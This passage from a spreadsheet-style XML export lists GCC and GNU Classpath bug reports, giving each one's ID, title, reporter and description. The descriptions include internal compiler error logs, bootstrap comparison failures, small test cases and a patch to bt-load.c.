FAIL: gcc.dg/pr50310-2.c (internal compiler error)
FAIL: gcc.dg/pr50310-2.c (test for excess errors)
Excess errors:
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:47:1: error: unrecognizable insn:
(insn 361 360 176 2 (set (reg:V2DF 342)
        (not:V2DF (ior:V2DF (reg:V2DF 470)
                (reg:V2DF 471)))) /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:30 -1
     (nil))
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/pr50310-2.c:47:1: internal compiler error: in extract_insn at recog.c:2311
0x1087afb3 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-trunk/gcc/rtl-error.c:108
0x1087b017 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-trunk/gcc/rtl-error.c:116
0x1083f6b7 extract_insn(rtx_insn*)
	/home/seurer/gcc/gcc-trunk/gcc/recog.c:2311
0x111c4b87 decompose_multiword_subregs
	/home/seurer/gcc/gcc-trunk/gcc/lower-subreg.c:1467
0x111c62cb execute
	/home/seurer/gcc/gcc-trunk/gcc/lower-subreg.c:1734
UNRESOLVED: gcc.dg/pr50310-2.c compilation failed to produce executable</t>
  </si>
  <si>
    <t>GCC-7649</t>
  </si>
  <si>
    <t>gcc generate a wrong code</t>
  </si>
  <si>
    <t xml:space="preserve"> *
 * hi 
 *  i'm a programmer for a embedded system project 
 * i am using the gcc as the compiler. my host is x86 and target machine
 * is ARM.
 * the follwing is my bug report. would you tell me is it a bug and if it 
 * was a bug how can i avoid facing it.
 * thanks in advanced.
 *
 * GCC BUG REPORT
 * when i complid the following source code 
 * the gcc complier will generate a big bug 
 * which may cause the local variable len get a invalid value.
 * it is terrible for me. 
 * i found it when i disassemble the obj file.
 * So you can disamble the .o file and you will touch the bug.
Release:
gcc v3.0
Environment:
cygwin
How-To-Repeat:
see the attached file's comment</t>
  </si>
  <si>
    <t>lium</t>
  </si>
  <si>
    <t>GCC-32209</t>
  </si>
  <si>
    <t>[4.3 Regression] Boot failure  Comparing stages 2 and 3 with --disable-checking</t>
  </si>
  <si>
    <t>Comparing stages 2 and 3
warning: ./cc1-checksum.o differs
Bootstrap comparison failure!
./cfgloopanal.o differs
./expmed.o differs
./df-problems.o differs
./combine.o differs
./ebitmap.o differs
./emit-rtl.o differs
./reload.o differs
./cgraphunit.o differs
./c-typeck.o differs
./recog.o differs
./cfgrtl.o differs
./tree-into-ssa.o differs
./tree-ssa-loop-ivopts.o differs
./cfglayout.o differs
./tree-tailcall.o differs
./tree-ssa-loop-ivcanon.o differs
./build/gengtype.o differs
./build/genpreds.o differs
./build/genoutput.o differs
./build/genemit.o differs
./build/genextract.o differs
./build/genautomata.o differs
./fold-const.o differs
./cse.o differs
./cfgexpand.o differs
./gcc.o differs
./see.o differs
./matrix-reorg.o differs
./tree-if-conv.o differs
./c-lex.o differs
./tree-ssa-reassoc.o differs
./c-format.o differs
./dwarf2out.o differs
./attribs.o differs
./tree-cfg.o differs
./tree-ssa-address.o differs
./tree-ssa.o differs
./tree-vrp.o differs
./modulo-sched.o differs
./dominance.o differs
./tree-ssa-phiopt.o differs
./lambda-code.o differs
./insn-recog.o differs
./tree-vect-transform.o differs
./tree-scalar-evolution.o differs
./reg-stack.o differs
./c-common.o differs
./tree-ssa-alias.o differs
./bt-load.o differs
./tree-ssa-forwprop.o differs
./haifa-sched.o differs
./mode-switching.o differs
./tree-dump.o differs
./final.o differs
./tree-data-ref.o differs
./global.o differs
./tree-ssa-sink.o differs
./diagnostic.o differs
./insn-attrtab.o differs
./cfgcleanup.o differs
./ipa-type-escape.o differs
./flow.o differs
./gcov.o differs
./gcse.o differs
./tree-vectorizer.o differs
./simplify-rtx.o differs
./loop-iv.o differs
./integrate.o differs
./tree-ssa-loop-prefetch.o differs
./tree-ssa-coalesce.o differs
./ipa-prop.o differs
./tree-outof-ssa.o differs
./tree-ssa-threadupdate.o differs
./tree-ssa-ccp.o differs
./tree-ssa-loop-niter.o differs
./tree-ssa-dce.o differs
./tree-ssa-dse.o differs
./tree-predcom.o differs
./postreload.o differs
./tree-ssa-pre.o differs
./tree-ssa-ter.o differs
./tree.o differs
./reload1.o differs
./tree-ssanames.o differs
./tree-ssa-structalias.o differs
./builtins.o differs
./c-decl.o differs
./tree-ssa-propagate.o differs
./profile.o differs
./omega.o differs
./bb-reorder.o differs
./cfgloopmanip.o differs
./value-prof.o differs
./gtype-desc.o differs
./ggc-common.o differs
./sched-rgn.o differs
./calls.o differs
./optabs.o differs
./tree-vect-analyze.o differs
./gimplify.o differs
./cfgloop.o differs
./varasm.o differs
./tree-ssa-math-opts.o differs
./regmove.o differs
./var-tracking.o differs
./regclass.o differs
./sched-deps.o differs
./loop-unroll.o differs
./tracer.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/usv/gcc_r43/build.5'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/usv/gcc_r43/build.5'
make: *** [bootstrap] Error 2
This occurs on two different machines with many more mis-comparisons for cc++fortran
Did not occur saturday and early sunday.</t>
  </si>
  <si>
    <t>malitzke</t>
  </si>
  <si>
    <t>GCC-32472</t>
  </si>
  <si>
    <t>ICE in trans-const.c:106 for REPEAT initialization expression of non-parameter</t>
  </si>
  <si>
    <t>r.f90:1: internal compiler error: in gfc_conv_string_init at fortran/trans-const.c:106
(4.3.0 20070623 x86_64-unknown-linux-gnu)
This is
  gcc_assert (expr-&gt;expr_type == EXPR_CONSTANT)
Test case:
CHARACTER(len=1025) :: string2 = repeat('?'1025)
print * string2
end
If one uses PARAMETER or a separate line (i.e. no initialization expression) then it works.</t>
  </si>
  <si>
    <t>GCC-11504</t>
  </si>
  <si>
    <t>-Wcast-qual vs. stl_tree</t>
  </si>
  <si>
    <t>-Wcast-qual cannot now be used with stl_tree.h after 
2003-07-04  Gawain Bolton  
	* include/bits/stl_tree.h: Performance and memory usage
	improvements.
See:
http://gcc.gnu.org/ml/libstdc++/2003-07/msg00143.html
http://gcc.gnu.org/ml/libstdc++/2003-07/msg00147.html
Testcase: (use -Wcast-qual)
  #include 
  using namespace std
  set &gt; V</t>
  </si>
  <si>
    <t>GCC-9266</t>
  </si>
  <si>
    <t>decrement pointer side effects are not working properly</t>
  </si>
  <si>
    <t>The location of the the left hand side of the equation changes in the function call popST().  The compiler currently saves the incorrect location to write the return code to.
// offending code:
ST[STPTR] = popST()
Release:
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
Environment:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --host=i386-redhat-linux --with-system-zlib
--enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
How-To-Repeat:
I compiled this code under 2.96 and 3.2 and compared the assembly.  The assembly code in 2.96 looks correct.</t>
  </si>
  <si>
    <t>GCC-80186</t>
  </si>
  <si>
    <t>ICE on C++ code with invalid constructor: Segmentation fault (program cc1plus)</t>
  </si>
  <si>
    <t>This seems to affect at least all versions 4.6.x and later.
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170325 (experimental) [trunk revision 246473] (GCC) 
$ 
$ g++-trunk -c small.cpp
small.cpp: In instantiation of â€˜struct Aâ€™:
small.cpp:10:34:   required from here
small.cpp:5:3: error: invalid constructor you probably meant â€˜A (const A&amp;)â€™
   A (A )
   ^
g++-trunk: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ 
----------------------------------------
template  struct A
{
  A ()
  A (A 
  A (A )
}
void f () 
{
  A  (A ())
}</t>
  </si>
  <si>
    <t>CLASSPATH-28535</t>
  </si>
  <si>
    <t>GConf depends on GDK Threads</t>
  </si>
  <si>
    <t>Last update to the GConf backend introduced a dependency on gdk_thread_enter/leave for thread synchronization but the configure option still requires only --enable-jni to build the gconf preference backend. Moreover the gconf build section in configure.ac requires only the standard files needed by gconf itself (we updated only the Makefile.am script).
I'm not an expert of the autoconf tools so I'm not sure if this needs fixing or not and how to fix it. My guess is that it should be fixed for the 0.92 release.</t>
  </si>
  <si>
    <t>neugens</t>
  </si>
  <si>
    <t>GCC-23232</t>
  </si>
  <si>
    <t>[4.1 only] DATA implied DO variables</t>
  </si>
  <si>
    <t>gcc version 4.1.0 20050730 (experimental)
The following two DATA statements are rejected by gfortran because J is not
considered a valid primary in those expressions although it is the variable of
another enclosing data-implied-do.
 PROGRAM p
  REAL :: ONE_ARRAY(100 100)
  INTEGER :: K J
  DATA ((ONE_ARRAY (K J) K = 1 J-1) J = 1 100) /4950 * 1.0/
  DATA ((ONE_ARRAY (K J) K = J 100) J = 1 100) /5050 * 0.0/
 END PROGRAM
$ gfortran -fsyntax-only snippet.f90
 In file snippet.f90:5
  DATA ((ONE_ARRAY (K J) K = 1 J-1) J = 1 100) /4950 * 1.0/
                                1
Error: Variable 'j' at (1) cannot appear in an initialization expression
 In file snippet.f90:6
  DATA ((ONE_ARRAY (K J) K = J 100) J = 1 100) /5050 * 0.0/
                             1
Error: Variable 'j' at (1) cannot appear in an initialization expression</t>
  </si>
  <si>
    <t>rofi</t>
  </si>
  <si>
    <t>GCC-32465</t>
  </si>
  <si>
    <t>[4.3 Regression] Linking 64-bit libgcj.so fails on Solaris 10/x86: non-PIC code despite -fPIC</t>
  </si>
  <si>
    <t xml:space="preserve">
A mainline bootstrap as of 20070618 on Solaris 10/x86 with the bundled gas
2.15 and my patch to support boehm-gc for x86-64
     http://gcc.gnu.org/ml/java-patches/2007-q2/msg00330.html
fails when linking the 64-bit libgcj:
[ca. 6800 lines omitted]
gnu::gcj::runtime::FinalizerThread::finalizer_ready    0x602     	gnu/gcj/.libs/runtime.o
ld: fatal: relocations remain against allocatable but non-writable sections
collect2: ld returned 1 exit status
I've checked for some of the affected object files that they have been
built with -fPIC nonetheless text relocations remain thus breaking the
link.
Environment:
System: SunOS erebus 5.11 snv_60 i86pc i386 i86pc
Architecture: i86pc
host: i386-pc-solaris2.10
build: i386-pc-solaris2.10
target: i386-pc-solaris2.10
configured with: /vol/gcc/src/gcc/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --with-gnu-as --with-as=/usr/sfw/bin/gas --with-gmp=/vol/gcc --with-mpfr=/vol/gcc --enable-languages=cc++fortranjavaobjcada --disable-libmudflap
How-To-Repeat:
Bootstrap mainline as described above.</t>
  </si>
  <si>
    <t>GCC-2064</t>
  </si>
  <si>
    <t>config/os/irix/bits/ctype_base.h incompatible with IRIX 5.3</t>
  </si>
  <si>
    <t>Trying to compile library gives following error:
/usr/src/gcc_objdir/gcc/g++ -B/usr/src/gcc_objdir/gcc/ -nostdinc++
  -L/usr/src/gcc_objdir/mips-sgi-irix5.3/libstdc++-v3/src
  -L/usr/src/gcc_objdir/mips-sgi-irix5.3/libstdc++-v3/src/.libs
  -B/usr/local/gcc-2.97/mips-sgi-irix5.3/bin/ -B/usr/local/gcc-2.97/mips-sgi-irix5.3/lib/
  -isystem /usr/local/gcc-2.97/mips-sgi-irix5.3/include -nostdinc++
  -I../../../../gcc/libstdc++-v3/include -I../../../../gcc/libstdc++-v3/include/std
  -I../../../../gcc/libstdc++-v3/include/c_std -I../include
  -I../../../../gcc/libstdc++-v3/libsupc++ -I../libio -I../../../../gcc/libstdc++-v3/libio
  -I../../../../gcc/libstdc++-v3/libmath -g -O2 -fno-implicit-templates -Wall -Wno-format
  -W -Wwrite-strings -Winline -fdiagnostics-show-location=once
  -c ../../../../gcc/libstdc++-v3/src/ios.cc -DPIC -o .libs/ios.o
In file included from ../../../../gcc/libstdc++-v3/include/bits/locale_facets.h:51
                 from ../../../../gcc/libstdc++-v3/include/bits/std_locale.h:38
                 from ../../../../gcc/libstdc++-v3/include/bits/std_fstream.h:40
                 from ../../../../gcc/libstdc++-v3/src/ios.cc:37:
../include/bits/ctype_base.h:44: `_ISupper' was not declared in this scope
../include/bits/ctype_base.h:45: `_ISlower' was not declared in this scope
../include/bits/ctype_base.h:46: `_ISalpha' was not declared in this scope
../include/bits/ctype_base.h:47: `_ISdigit' was not declared in this scope
../include/bits/ctype_base.h:48: `_ISxdigit' was not declared in this scope
../include/bits/ctype_base.h:49: `_ISspace' was not declared in this scope
../include/bits/ctype_base.h:50: `_ISprint' was not declared in this scope
../include/bits/ctype_base.h:51: `_ISgraph' was not declared in this scope
../include/bits/ctype_base.h:52: `_IScntrl' was not declared in this scope
../include/bits/ctype_base.h:53: `_ISpunct' was not declared in this scope
../include/bits/ctype_base.h:54: `_ISalnum' was not declared in this scope
The problem is that config/os/irix/ctype_base.h is compatible
with /usr/include/ctype.h of IRIX 6.5 but not with IRIX 5.3.
I am not sure how config/os/irix/ctype_base.h should be
modified to be compatible with both but I have attached
/usr/include/ctype.h for IRIX 5.3.
Release:
gcc version 2.97 20010205 (experimental)
Environment:
IRIX 5.3 IP20 mips</t>
  </si>
  <si>
    <t>GCC-1926</t>
  </si>
  <si>
    <t>valarray_meta.h: typo line 300</t>
  </si>
  <si>
    <t>Line 300 valarray_meta.h __e should be __v. Causes compile error.
Release:
CVS as of Feb 10 2001
Environment:
i686-linux
How-To-Repeat:
#include 
#include 
using namespace std
int addone(const int &amp;x) 
{ 
    return x+1
}
main()
{
    valarray prog(0 60)
    valarray r(1 60)
    r[4] = 7
    prog = prog.apply(addone)
    cout &lt;&lt; prog.sum() &lt;&lt;    &lt;&lt; r.sum() &lt;&lt; endl
}</t>
  </si>
  <si>
    <t>mjbedy</t>
  </si>
  <si>
    <t>GCC-38509</t>
  </si>
  <si>
    <t>Bogus attempt to free a non-heap object warning</t>
  </si>
  <si>
    <t>class TestCase {
private:
  const int *pointer
public:
  TestCase() {
    static int non_heap = 0
    this-&gt;pointer = 
  }
  ~TestCase() {
    if (*this-&gt;pointer != 0) __builtin_free(const_cast(this-&gt;pointer))
  }
}
int main(int argc const char *argv[]) {
 TestCase test
 return 0
}
/*
The code above compiled g++ 4.4.0 with -O1 (or any -On except -O0) gives the following warning:
test.cpp: In function â€˜int main(int const char**)â€™:
test.cpp:12: warning: attempt to free a non-heap object â€˜non_heapâ€™
In this case the warning is bogus because the free can never be reached.
Complete command line:
g++ -O1 -o test test.cpp
Output from g++ -v -O1 -o test test.cpp:
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --with-arch=pentium-m --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 4.4.0 20081210 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-v' '-O1' '-o' 'test' '-shared-libgcc' '-mtune=generic' '-march=pentium-m'
 /usr/local/libexec/gcc/i686-pc-linux-gnu/4.4.0/cc1plus -quiet -v -D_GNU_SOURCE test.cpp -quiet -dumpbase test.cpp -mtune=generic -march=pentium-m -auxbase test -O1 -version -o /tmp/ccIffeq5.s
ignoring nonexistent directory /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/../../../../include/c++/4.4.0
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/../../../../include/c++/4.4.0/i686-pc-linux-gnu
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/../../../../include/c++/4.4.0/backward
 /usr/local/include
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/include
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.4.0 20081210 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.4.0 20081210 (experimental) GMP version 4.2.2 MPFR version 2.3.2.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: b043f60097b3fa3e759e89265ea8ebdb
test.cpp: In function â€˜int main(int const char**)â€™:
test.cpp:12: warning: attempt to free a non-heap object â€˜non_heapâ€™
COLLECT_GCC_OPTIONS='-v' '-O1' '-o' 'test' '-shared-libgcc' '-mtune=generic' '-march=pentium-m'
 as -V -Qy -o /tmp/ccshvEr5.o /tmp/ccIffeq5.s
GNU assembler version 2.18.0 (i486-linux-gnu) using BFD version (GNU Binutils for Debian) 2.18.0.20080103
COMPILER_PATH=/usr/local/libexec/gcc/i686-pc-linux-gnu/4.4.0/:/usr/local/libexec/gcc/i686-pc-linux-gnu/4.4.0/:/usr/local/libexec/gcc/i686-pc-linux-gnu/:/usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/:/usr/local/lib/gcc/i686-pc-linux-gnu/
LIBRARY_PATH=/usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/:/usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-O1' '-o' 'test' '-shared-libgcc' '-mtune=generic' '-march=pentium-m'
 /usr/local/libexec/gcc/i686-pc-linux-gnu/4.4.0/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o test /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/crtbegin.o -L/usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0 -L/usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/../../.. /tmp/ccshvEr5.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc/i686-pc-linux-gnu/4.4.0/crtend.o /usr/lib/crtn.o
Note: this is a self-compiled binary of SVN revision 142654.
*/</t>
  </si>
  <si>
    <t>rubidium</t>
  </si>
  <si>
    <t>GCC-27406</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/built-in-setjmp.c fails on sh64-*-linux-gnu with -O2</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/built-in-setjmp.c fails at -O2 with the ICE:
built-in-setjmp.c:39: error: call edges for non-call insn in bb 6
built-in-setjmp.c:39: error: in basic block 6:
built-in-setjmp.c:39: error: flow control insn inside a basic block
(call_insn/u:HI 58 147 172 6 (parallel [
            (set (reg:SI 2 r2)
                (call (mem:DI (reg/f:SI 128 tr0 [188]) [0 S8 A64])
                    (const_int 0 [0x0])))
            (clobber (reg:DI 18 r18))
        ]) 236 {call_value_media} (nil)
    (expr_list:REG_DEAD (reg:SI 3 r3)
        (expr_list:REG_DEAD (reg/f:SI 128 tr0 [188])
            (expr_list:REG_UNUSED (reg:DI 18 r18)
                (expr_list:REG_EH_REGION (const_int 0 [0x0])
                    (nil)))))
    (expr_list:REG_DEP_TRUE (use (mem:BLK (scratch) [0 A8]))
        (expr_list:REG_DEP_TRUE (use (reg:SI 3 r3))
            (expr_list:REG_DEP_TRUE (use (reg:SI 2 r2 [ p ]))
                (nil)))))
built-in-setjmp.c:39: internal compiler error: in rtl_verify_flow_info_1 at cfgrtl.c:2040
on sh64-unknown-linux-elf target.  It doesn't occur on sh64-elf
target which uses the sjlj exceptions.  It seems that bt-load.c:
migrate_btr_def() moves the insn which sets the target register
to just after the call insn which was the last insn of a BB having
abnormal edges and the assersion in rtl_verify_flow_info_1 fails.
I'm testing the patch below now.
--- ORIG/trunk/gcc/bt-load.c	Wed Mar 15 21:20:37 2006
+++ LOCAL/trunk/gcc/bt-load.c	Mon May  1 08:51:18 2006
@@ -13396 +133915 @@ migrate_btr_def (btr_def def int min_co
       /* Try to move the instruction that sets the target register into
 	 basic block TRY.  */
       int try_freq = basic_block_freq (try)
+      edge_iterator ei
+      edge e
+
+      /* If TRY has abnormal edges skip it.  */
+      FOR_EACH_EDGE (e ei try-&gt;succs)
+	if (e-&gt;flags &amp; EDGE_COMPLEX)
+	  break
+      if (e)
+	continue
       if (dump_file)
 	fprintf (dump_file trying block %d ... try-&gt;index)</t>
  </si>
  <si>
    <t>GCC-83884</t>
  </si>
  <si>
    <t>FAIL: gnat.dg/check_displace_generation.adb (test for excess errors)</t>
  </si>
  <si>
    <t>spawn -ignore SIGHUP /home/dave/gnu/gcc/objdir/gcc/gnatmake --GCC=/home/dave/gnu
/gcc/objdir/gcc/xgcc --GNATBIND=/home/dave/gnu/gcc/objdir/gcc/gnatbind --GNATLIN
K=/home/dave/gnu/gcc/objdir/gcc/gnatlink -cargs -B/home/dave/gnu/gcc/objdir/gcc
-largs --GCC=/home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/objdir/gcc
 -margs --RTS=/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada -q -f /home/dave
/gnu/gcc/gcc/gcc/testsuite/gnat.dg/check_displace_generation.adb -fno-diagnostic
s-show-caret -fdiagnostics-color=never -lm -o ./check_displace_generation.exe
+===========================GNAT BUG DETECTED==============================+
| 8.0.0 20180114 (experimental) [trunk revision 256677] (hppa-linux-gnu) GCC err
or:|
| in tree_to_poly_uint64 at tree.h:4284                                   |
| Error detected around /home/dave/gnu/gcc/gcc/gcc/testsuite/gnat.dg/check_displ
ace_generation.adb:40:4|
| Please submit a bug report see https://gcc.gnu.org/bugs/ .              |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact command that you entered.                              |
| Also include sources listed below.                                       |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
Consider also -gnatd.n switch (see debug.adb).
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/system.ads
/home/dave/gnu/gcc/gcc/gcc/testsuite/gnat.dg/check_displace_generation.adb
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/a-tags.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/ada.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-stoele.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-exctab.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-stalib.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/a-unccon.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/a-stream.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-soflin.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/a-except.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-parame.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-traent.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-secsta.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-stache.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-addima.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-conca2.ads
/home/dave/gnu/gcc/objdir/hppa-linux-gnu/./libada/adainclude/s-stoele.adb
raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:407
gnatmake: /home/dave/gnu/gcc/gcc/gcc/testsuite/gnat.dg/check_displace_generation.adb compilation error
compiler exited with status 1
Executing on host: /home/dave/gnu/gcc/objdir/gcc/gnatclean -c -q -n ./check_displace_generation   (timeout = 300)
spawn -ignore SIGHUP /home/dave/gnu/gcc/objdir/gcc/gnatclean -c -q -n ./check_displace_generation
./check_displace_generation.ali
FAIL: gnat.dg/check_displace_generation.adb 3 blank line(s) in output
FAIL: gnat.dg/check_displace_generation.adb (test for excess errors)
Excess errors:
+===========================GNAT BUG DETECTED==============================+
| 8.0.0 20180114 (experimental) [trunk revision 256677] (hppa-linux-gnu) GCC error:|
| in tree_to_poly_uint64 at tree.h:4284                                   |
| Error detected around /home/dave/gnu/gcc/gcc/gcc/testsuite/gnat.dg/check_displace_generation.adb:40:4|
| Please submit a bug report see https://gcc.gnu.org/bugs/ .              |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact command that you entered.                              |
| Also include sources listed below.                                       |
+==========================================================================+
Similar fails:
FAIL: gnat.dg/generic_dispatch.adb 3 blank line(s) in output
FAIL: gnat.dg/generic_dispatch.adb (test for excess errors)
FAIL: gnat.dg/interface_conv.adb 3 blank line(s) in output
FAIL: gnat.dg/interface_conv.adb (test for excess errors)
FAIL: gnat.dg/test_iface_aggr.adb 3 blank line(s) in output
FAIL: gnat.dg/test_iface_aggr.adb (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-61208</t>
  </si>
  <si>
    <t>armhf: generated asm code produces branch out of range error in gas with -Os</t>
  </si>
  <si>
    <t>Created attachment 32811
Preprocessed source (compressed)
On Debian unstable with debian gcc 4.8.2-21 the attached preprocessed source fails to build with:
/tmp/cc9VIAtd.s: Assembler messages:
/tmp/cc9VIAtd.s:827: Error: branch out of range</t>
  </si>
  <si>
    <t>GCC-34400</t>
  </si>
  <si>
    <t>[4.3 regression] bad interaction between DF and SJLJ exceptions</t>
  </si>
  <si>
    <t>The thread starts here: http://gcc.gnu.org/ml/gcc/2007-11/msg00791.html
In addition I observe the same behaviour when building a native SJLJ version of libgnat on x86_64.
Krister Walfridsson says: The problem was introduced by revision 125624 (the dataflow merge)..</t>
  </si>
  <si>
    <t>GCC-60267</t>
  </si>
  <si>
    <t>ICE in c_pp_lookup_pragma at c-family/c-pragma.c:1232 ICE in tsubst_copy at cp/pt.c:12887</t>
  </si>
  <si>
    <t>Hi All
The Blitz++ library (http://sf.net/projects/blitz) contains some #pragma ivdep macros intended for the Intel C++ compiler. Having learnt that GCC now supports a corresponding GCC ivdep pragma I've tried changing all occurances of pragma ivdep in Blitz++ with the GCC ones (encapsulating them in some define-checks to detect the compiler). 
Trying then just to parse the include files with:
#define BZ_USE_ALIGNMENT_PRAGMAS  
#include 
int main() {}
using the Debian's gcc-snapshot (20140212) I've got an ICE:
**************************************************************************************
In file included from /usr/include/blitz/globeval.cc:34:0
                 from /usr/include/blitz/array/ops.cc:38
                 from /usr/include/blitz/array.cc:13
                 from /usr/include/blitz/array-impl.h:2559
                 from bug.cpp:2:
/usr/include/blitz/tvevaluate.h: In instantiation of 'static void blitz::_tv_evaluator::evaluate_aligned(T_numtype* const T_expr T_expr = blitz::_bz_ArrayExpr &gt; T_update = blitz::_bz_update bool unroll = false int N_length = 1]':
/usr/include/blitz/tvevaluate.h:88:85:   required from 'static void blitz::_tv_evaluator::select_evaluation(blitz::TinyVector T_expr = blitz::_bz_ArrayExpr &gt; T_update = blitz::_bz_update bool unroll = false int N_length = 1]'
/usr/include/blitz/tvevaluate.h:195:81:   required from 'void blitz::TinyVector::_tv_evaluate(const T_expr T_update = blitz::_bz_update P_numtype = bool int N_length = 1]'
/usr/include/blitz/tinyvec2.cc:89:57:   required from 'blitz::TinyVector P_numtype = bool int N_length = 1]'
/usr/include/blitz/tinyvec2.cc:77:13:   required from 'blitz::TinyVector int N_length = 1 blitz::TinyVector::T_numtype = bool]'
/usr/include/blitz/listinit.h:90:13:   required from 'blitz::ListInitializationSwitch::~ListInitializationSwitch() [with T_array = blitz::TinyVector T_iterator = bool*]'
/usr/include/blitz/array/storage.h:93:24:   required from 'blitz::GeneralArrayStorage::GeneralArrayStorage(blitz::paddingPolicy) [with int N_rank = 1]'
/usr/include/blitz/array/storage.h:228:47:   required from here
/usr/include/blitz/tvevaluate.h:108:17: internal compiler error: in tsubst_copy at cp/pt.c:12887
     for (int i=0 i &lt; N_length ++i)
                 ^
Please submit a full bug report
**************************************************************************************
Trying to better prepare the bug report and executing gcc with -save-temps results in another ICE:
**************************************************************************************
In file included from /usr/include/blitz/globeval.cc:34:0
                 from /usr/include/blitz/array/ops.cc:38
                 from /usr/include/blitz/array.cc:13
                 from /usr/include/blitz/array-impl.h:2559
                 from bug.cpp:2:
/usr/include/blitz/tvevaluate.h:38:0: internal compiler error: in c_pp_lookup_pragma at c-family/c-pragma.c:1232
 ^
Please submit a full bug report
**************************************************************************************
How to best help in tracking those down?
Sylwester</t>
  </si>
  <si>
    <t>slayoo</t>
  </si>
  <si>
    <t>GCC-69945</t>
  </si>
  <si>
    <t>Provide an equivalent of __libc_freeres to release emergency EH pool memory</t>
  </si>
  <si>
    <t>Glibc provides a hook that tools such as valgrind and sanitizers can call to release still reachable memory that is in use at program exit.
We should do the same so that the emergency EH pool can be freed and people will stop reporting still reachable memory as a leak in libstdc++.
It won't be possible to backport a new global symbol to gcc-5-branch unless we do it before the gcc 6 release using libstdc++.so.6.0.22 for gcc 5.4 and then using libstdc++.so.6.0.23 for gcc 6.
To avoid exporting a new global symbol in gcc-5-branch it could be put in a special section which would allow valgrind to find it without going through the symbol table. (We'd probably still want a global symbol for future releases so that other tools can call it the obvious way).</t>
  </si>
  <si>
    <t>GCC-67985</t>
  </si>
  <si>
    <t>-miamcu -march=haswell should allow x87 and AVX instructions</t>
  </si>
  <si>
    <t>Since -miamcu specifies how parameters are passed to functions
inside function we can use any instructions -march= allows.
-miamcu -march=haswell should allow x87 and AVX instructions</t>
  </si>
  <si>
    <t>GCC-14518</t>
  </si>
  <si>
